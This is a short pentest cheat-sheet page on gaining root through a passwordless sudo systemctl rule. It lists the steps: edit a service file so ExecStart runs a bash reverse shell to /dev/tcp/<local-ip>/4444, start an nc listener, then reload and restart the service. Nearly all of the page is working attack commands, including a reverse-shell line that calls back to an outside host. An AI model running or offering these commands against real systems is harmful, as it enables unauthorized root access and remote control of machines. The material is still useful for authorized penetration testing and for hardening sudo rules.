Exploit Notes

Sudo Systemctl Privilege Escalation

Last modified: 2023-02-05

Privilege Escalation

sudo systemctl is vulnerable to privilege escalation by modifying the configuration file.


sudo -l

(ALL) NOPASSWD: systemctl

If we can run "systemctl" command as root, and we can edit the config file, then we might be a root user.


1. Update the Config File

We need to insert the payload for reverse shell to get a root shell into the /etc/systemd/system/example.service.

This is an example service.

ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'


Replace “<local-ip>” with your local ip address.

2. Start Listener in Local Machine

Then start listener for getting a root shell.

nc -lvnp 4444

3. Restart the Service

Reload the daemon and restart.

sudo systemctl daemon-reload
sudo systemctl restart example.service

Now we should get a shell in local machine.

Tools by HDKS


Automatic web fuzzer.


Auto reconnaissance CLI.

Hash Cracker

Hash identifier.